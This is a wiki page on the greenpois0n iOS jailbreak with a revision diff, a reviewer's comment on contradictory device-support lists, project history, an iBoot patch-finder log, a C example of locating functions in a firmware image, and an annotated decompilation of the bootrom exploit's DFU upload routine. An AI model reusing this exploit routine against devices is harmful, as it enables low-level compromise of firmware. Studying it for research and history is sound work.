Difference between revisions of "Greenpois0n (jailbreak)"

From The iPhone Wiki
(Supported Devices: I like the concept of a table, but it's not needed if all you need to say is it works on 3.2.2 and 4.1.)
Line 24: Line 24:
   
 
=== Supported Devices ===
 
=== Supported Devices ===
  +
greenpois0n requires the device to be on either iOS 3.2.2 ([[K48ap|iPad 1G]]) or iOS 4.1 (all other devices). Of the devices that support these firmware revisions, the only one ''not'' supported is the [[N82ap|iPhone 3G]].
The current version of Greenp0ison (RC4) supports the following iDevices:
 
 
{| class="wikitable" style="font-size: smaller; text-align: center; width: auto; table-layout: fixed; border-collapse: collapse;" border="1"
 
|iDevice
 
|{{iOS 3.2.x - iPad only}}
 
|{{iOS 4.0}}
 
|{{iOS 4.1}}
 
|{{iOS 4.2}}
 
|-
 
|iPhone 2G
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|-
 
|iPhone 3G
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPhone 3Gs new/old bootrom
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPhone 4
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 1G
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 2G MB/MC
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 3G
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 4G
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPad 1G Wifi/3G
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|-
 
|ATV2 (Apple TV 2G)
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|}
 
   
 
=== Output ===
 
=== Output ===
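Review bot: the replacement sentence and the table it removes disagree, and the edit does not say which side is wrong. The table marks the iPhone 3G and the iPod touch 2G as "Yes - Untethered" on iOS 4.0 and 4.1, while the new text says the iPhone 3G is the only unsupported device and names only iOS 3.2.2 and 4.1 (no 4.0 at all). Either keep one line stating that iOS 4.0 is not supported and that the table was wrong about the iPhone 3G, or note the correction in the edit summary, so a reader comparing revisions is not left with two contradictory support lists. The removed line "The current version of Greenp0ison (RC4)" also misspells the name, and the release designation (RC4) is lost in the new sentence; if the support statement is version-specific, say which version it describes.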

Revision as of 03:37, 26 October 2010


Greenpois0n is both a cross-platform hacker toolkit (helping users find their own exploits for jailbreaks, write custom ramdisks, and create custom firmwares) and a jailbreak tool for iDevices, written by the Chronic Dev team.

Current Toolset

History

Greenpois0n was originally written around two exploits: SHAtter (a bootrom exploit) and a userland exploit provided by Comex that makes the jailbreak untethered. A release date of 10/10/10 at 10:10:10 AM (GMT) was announced, along with the list of supported devices. Because of the nature of SHAtter, only iDevices with the A4 processor were supported. On 9 October 2010, the day before that date, geohot released a different jailbreak, limera1n, built on a different bootrom exploit; this led to a delay in greenpois0n's release while it was reworked to use geohot's exploit instead of SHAtter.

Controversy

There was much controversy surrounding the sudden release of limera1n and the motives behind it. The main reasons given for the limera1n release were:

  1. Use an exploit that Apple already knew about (newer iBoot versions show the hole patched)
  2. Support more iDevices than SHAtter
  3. Hopefully save the SHAtter bootrom exploit for future iDevices

The reasoning is that a bootrom exploit cannot be patched with a software update; closing the hole requires new hardware. Since the limera1n hole had already been discovered and patched by Apple, the community benefits if SHAtter is kept unreleased in the hope of using it on new hardware, such as the 5th generation iPhone/iPod touch and the iPad 2G.

Supported Devices

greenpois0n requires the device to be on either iOS 3.2.2 (iPad 1G) or iOS 4.1 (all other devices). Of the devices that support these firmware revisions, the only one not supported is the iPhone 3G.

Output

iPhone 4 with greenpois0n output (via irecovery):

Attempting to initialize greenpois0n
Initializing commands
Searching for cmd_ramdisk
Found cmd_ramdisk string at 0x8401c7ac
Found cmd_ramdisk reference at 0x84000d64
Found cmd_ramdisk function at 0x84000cd1
Initializing patches
Initializing memory
Initializing aes
Searching for aes_crypto_cmd
Found aes_crypto_cmd string at 0x84021a8c
Found aes_crypto_cmd reference at 0x84017bb8
Found aes_crypto_cmd fnction at 0x84017b51
Initializing bdev
Initializing image
Initializing nvram
Initializing kernel
Greenpois0n initialized
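The three "Found cmd_ramdisk ..." lines above are the trace of one technique: locate a known string in the decrypted iBoot image, find the word that references it, then walk backwards to the start of the function that uses it. What follows is an added example of that search in C; it is not greenpois0n's code. It runs over a constructed 512-byte stand-in for an iBoot image at the load base 0x84000000 that the log's addresses imply. The layout of the fake image, the function names, and the assumptions that the reference is a 4-byte-aligned little-endian pointer (a literal-pool entry) and that the handler starts with a Thumb PUSH {..., lr} (encoding 0xB5xx) are all assumptions of the example, not facts taken from the page.

```c
/* Added example, not greenpois0n's own code: string -> reference -> function
 * search over a constructed stand-in for a decrypted iBoot image. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IMG_BASE 0x84000000u   /* load base implied by the addresses in the log */

static uint8_t image[0x200];   /* constructed image; NOT a real firmware dump */

/* Lay out the fake image: a decoy Thumb function at 0x20, the "handler" at
 * 0x40, a literal-pool pointer to the command name at 0x60, a decoy string
 * sharing the prefix at 0xC0, and the real NUL-terminated name at 0x100. */
void build_image(void) {
    uint32_t ptr = IMG_BASE + 0x100;
    memset(image, 0, sizeof image);
    image[0x20] = 0xF0; image[0x21] = 0xB5;   /* decoy PUSH {r4-r7,lr} */
    image[0x40] = 0xF0; image[0x41] = 0xB5;   /* handler prologue PUSH {r4-r7,lr} */
    image[0x42] = 0x00; image[0x43] = 0xBF;   /* NOP */
    memcpy(&image[0x60], &ptr, sizeof ptr);   /* literal pool: pointer to the string */
    memcpy(&image[0xC0], "ramdiskX", 9);      /* decoy: same prefix, different string */
    memcpy(&image[0x100], "ramdisk", 8);      /* the command name, with its terminator */
}

/* Step 1: find the string. The terminator is part of the pattern so a longer
 * name with the same prefix does not match. Returns 0 when absent. */
uint32_t find_string(const uint8_t *img, size_t len, uint32_t base, const char *s) {
    size_t n = strlen(s) + 1;
    for (size_t off = 0; off + n <= len; off++)
        if (memcmp(img + off, s, n) == 0)
            return base + (uint32_t)off;
    return 0;
}

/* Step 2: find an aligned 32-bit little-endian word holding that address
 * (assumption: iBoot reaches the string through a literal-pool pointer). */
uint32_t find_reference(const uint8_t *img, size_t len, uint32_t base, uint32_t target) {
    for (size_t off = 0; off + 4 <= len; off += 4) {
        uint32_t w = (uint32_t)img[off] | (uint32_t)img[off + 1] << 8 |
                     (uint32_t)img[off + 2] << 16 | (uint32_t)img[off + 3] << 24;
        if (w == target)
            return base + (uint32_t)off;
    }
    return 0;
}

/* Step 3: walk backwards from the reference, two bytes at a time, to the
 * nearest Thumb PUSH that saves lr (0xB5xx). The result carries the Thumb
 * bit, which is why the log shows odd function addresses. */
uint32_t find_function(const uint8_t *img, uint32_t base, uint32_t ref) {
    uint32_t off = ref - base;
    while (off >= 2) {
        off -= 2;
        uint16_t hw = (uint16_t)(img[off] | img[off + 1] << 8);
        if ((hw & 0xFF00) == 0xB500)
            return (base + off) | 1;
    }
    return 0;
}

/* Run all three steps for one command name; -1 if any step fails. */
int locate(const char *name, uint32_t *str, uint32_t *ref, uint32_t *fn) {
    *str = find_string(image, sizeof image, IMG_BASE, name);
    if (!*str) return -1;
    *ref = find_reference(image, sizeof image, IMG_BASE, *str);
    if (!*ref) return -1;
    *fn = find_function(image, IMG_BASE, *ref);
    return *fn ? 0 : -1;
}

int main(void) {
    uint32_t s, r, f;
    build_image();
    if (locate("ramdisk", &s, &r, &f) != 0) { puts("not found"); return 1; }
    printf("Found cmd_ramdisk string at 0x%08x\n", s);
    printf("Found cmd_ramdisk reference at 0x%08x\n", r);
    printf("Found cmd_ramdisk function at 0x%08x\n", f);
    return 0;
}
```

Against a real decrypted iBoot the same three functions work unchanged once `image` is the file contents and `IMG_BASE` is the image's load address; the two things to re-check there are that the reference really is a 4-byte-aligned pointer (an immediate-encoded address would need a different scan) and that the backward walk does not stop at a PUSH belonging to an unrelated function that happens to sit between the literal pool and the handler.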

Decompiled Exploit Code

Apocolipse has provided a decompiled version of the exploit function (note: it is incomplete; x86 decompilers can only do so much). The output is in Hex-Rays style, so the negative constants below are 32-bit addresses and fill patterns printed as signed integers.

 /* Comments were added to the decompiler output; variable names are the decompiler's.
    Constants printed as signed ints:
      -2080198655 = 0x8402B001   -2080129124 = 0x8403BF9C
      -2080231423 = 0x84023001   -2080161884 = 0x84033FA4
       -858993460 = 0xCCCCCCCC  -1145324613 = 0xBBBBBBBB
    8930 and 8920 are libpois0n's decimal chip IDs (S5L8930 = A4, S5L8920 = iPhone 3GS).
    irecv_control_transfer(client, bmRequestType, bRequest, wValue, wIndex, data, length):
      0x21 (33) = host-to-device class/interface request, 0xA1 (161) = device-to-host;
      bRequest 1 = DFU_DNLOAD, bRequest 2 = DFU_UPLOAD. */
 signed int __cdecl upload_exploit()
 {
   int v0; // eax@1
   signed int v1; // edx@2
   int v2; // ebx@2
   int v3; // eax@4
   char *v4; // eax@5
   unsigned int v5; // ebx@8
   int v6; // ecx@14
   signed int result; // eax@15
   signed int v8; // ST38_4@18
   int v9; // eax@28
   signed int v10; // [sp+38h] [bp-1030h]@4
   signed int v11; // [sp+3Ch] [bp-102Ch]@2
   char v12; // [sp+4Ch] [bp-101Ch]@3   0x800-byte buffer: the payload packet
   char v13; // [sp+84Ch] [bp-81Ch]@5   0x800-byte buffer: headers and filler packets
   int v14; // [sp+104Ch] [bp-1Ch]@1    stack canary copy; also marks the end of v13
   v14 = *MK_FP(__GS__, 20);
   v0 = *(_DWORD *)(device + 16);       // device->chip_id
   if ( v0 == 8930 )                    // A4 devices
   {
     v11 = 174080;                      // 0x2A800 bytes of filler before the payload
     v1 = -2080198655;                  // 0x8402B001: payload address, Thumb bit set
     v2 = -2080129124;                  // 0x8403BF9C: fourth word of each fake header
   }
   else
   {
     v1 = -2080231423;                  // 0x84023001
     v11 = 141312;                      // 0x22800
     v2 = (((v0 == 8920) - 1) & 0xFFFFFFF4) - 2080161884; // 0x84033FA4 on 8920, 0x84033F98 otherwise
   }
   memset(&v12, 0, 0x800u);             // one DFU packet: 0x230 bytes of payload, zero padded
   memcpy(&v12, exploit, 0x230u);
   if ( libpois0n_debug )
   {
     v8 = v1;
     ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, "Resetting device counters\n");
     v1 = v8;
   }
   v10 = v1;
   v3 = irecv_reset_counters(client);   // restart the DFU block counter from zero
   if ( v3 )
   {
     irecv_strerror(v3);                // argument dropped by the decompiler; format is the "%s\n" tail of "Cannot find %s\n"
     __fprintf_chk(stderr, 1, &aCannotFindS[12]);
     result = -1;
   }
   else
   {
     memset(&v13, -858993460, 0x800u);  // 0xCC filler
     v4 = &v13;
     do                                 // 32 fake headers, one per 64 bytes: {0x405, 0x101, payload addr, v2}
     {
       *(_DWORD *)v4 = 1029;            // 0x405
       *((_DWORD *)v4 + 1) = 257;       // 0x101
       *((_DWORD *)v4 + 2) = v10;
       *((_DWORD *)v4 + 3) = v2;
       v4 += 64;
     }
     while ( (int *)v4 != &v14 );       // &v14 lies 0x800 bytes past &v13: end of the buffer
     if ( libpois0n_debug )
       ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, "Sending chunk headers\n");
     v5 = 0;
     irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);   // DNLOAD: the header packet
     memset(&v13, -858993460, 0x800u);
     do                                 // DNLOAD: v11/0x800 packets of 0xCC filler (85 on A4, 69 otherwise)
     {
       v5 += 2048;
       irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
     }
     while ( v5 < v11 );
     if ( libpois0n_debug )
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n");
     irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048);   // DNLOAD: the payload packet
     if ( libpois0n_debug )
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
     memset(&v13, -1145324613, 0x800u); // 0xBB filler
     irecv_control_transfer(client, 161, 1, 0, 0, &v13, 2048);  // request 1 sent device-to-host
     irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);   // one more DNLOAD of filler
     if ( libpois0n_debug )
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n");
     irecv_control_transfer(client, 33, 2, 0, 0, &v13, 0);      // request 2 with a zero-length buffer
     irecv_reset(client);
     irecv_finish_transfer(client);
     if ( libpois0n_debug )
     {
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n");
       if ( libpois0n_debug )
         ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
     }
     client = (void *)irecv_reconnect(client, 2u);   // wait 2 s, then reopen the device
     if ( client )
     {
       result = 0;
     }
     else
     {
       if ( libpois0n_debug )
       {
         v9 = irecv_strerror(0);
         __fprintf_chk(stderr, 1, &aCannotFindS[12], v9);
       }
       __fprintf_chk(stderr, 1, "Unable to reconnect\n");
       result = -1;
     }
   }
   if ( *MK_FP(__GS__, 20) != v14 )     // stack canary check; v6 is uninitialised, a decompiler artifact
     __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
   return result;
 }